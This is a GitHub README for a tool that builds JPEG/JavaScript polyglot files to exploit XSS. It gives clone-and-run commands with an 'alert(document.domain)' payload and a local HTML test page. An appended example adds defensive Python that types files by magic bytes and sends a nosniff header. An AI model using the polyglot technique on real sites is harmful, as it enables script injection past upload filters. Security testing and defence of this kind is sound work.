4n86rakam1/xss_injection_in_jpeg

Exploiting XSS with JPEG Polyglot

Requirement

  • ImageMagick

Usage

sudo apt install imagemagick  # on Debian

git clone https://github.com/4n86rakam1/xss_injection_in_jpeg.git
cd xss_injection_in_jpeg
python3 exploit.py --payload 'alert(document.domain)' --imagesize 200x200 --output xss.js

Test

  1. Confirm that the JavaScript file for exploiting XSS has been generated.

  2. Change the src attribute value in index.html to your output filename.

    e.g.

    <!DOCTYPE html>
    <html lang="en">
    <head>
        <script charset="ISO-8859-1" src="./xss.js"></script>
    </head>
    <body></body>
    </html>
  3. Run an HTTP server.

    e.g.

    python3 -m http.server
  4. Open http://localhost:8000 in a browser.

    POC

Tested in Google Chrome Version 114.0.5735.106 (Official Build) (64-bit).
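
Step 3 serves the file with python3 -m http.server, which picks the Content-Type from the file name, so a polyglot saved as xss.js is delivered as JavaScript. The following is an added example, not part of this repository, showing the defensive counterpart for a server that hosts untrusted files: decide the type from the leading magic bytes and send X-Content-Type-Options: nosniff. The function names, the magic-byte table and the sample bytes are assumptions constructed for illustration, as is the assumption that the polyglot starts with the normal JPEG start-of-image marker.

```python
import mimetypes

# Leading magic bytes for the image formats this (hypothetical) host accepts.
MAGIC = (
    (b"\xff\xd8\xff", "image/jpeg"),
    (b"\x89PNG\r\n\x1a\n", "image/png"),
    (b"GIF87a", "image/gif"),
    (b"GIF89a", "image/gif"),
)

# Constructed sample: JPEG SOI + APP0/JFIF header followed by filler bytes.
SAMPLE = b"\xff\xd8\xff\xe0\x00\x10JFIF\x00" + b"\x00" * 32

def sniff_type(data):
    """Return the MIME type implied by the file's first bytes, or None."""
    for magic, mime in MAGIC:
        if data.startswith(magic):
            return mime
    return None

def by_extension(filename):
    """Type chosen from the name alone, as python3 -m http.server does."""
    return mimetypes.guess_type(filename)[0] or "application/octet-stream"

def is_mismatch(filename, data):
    """True when the content is a known image but the name claims otherwise."""
    sniffed = sniff_type(data)
    return sniffed is not None and by_extension(filename) != sniffed

def safe_headers(data):
    """Response headers for an untrusted file, decided by content, not name."""
    sniffed = sniff_type(data)
    headers = {
        "Content-Type": sniffed or "application/octet-stream",
        # nosniff makes browsers refuse a <script> load whose type is not JS.
        "X-Content-Type-Options": "nosniff",
    }
    if sniffed is None:
        # Unknown content is offered as a download, never rendered inline.
        headers["Content-Disposition"] = "attachment"
    return headers

if __name__ == "__main__":
    print("by name:   ", by_extension("xss.js"))
    print("by content:", safe_headers(SAMPLE), is_mismatch("xss.js", SAMPLE))
```

A name/content mismatch such as a .js file with JPEG magic bytes is also a useful signal to log or reject at upload time.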
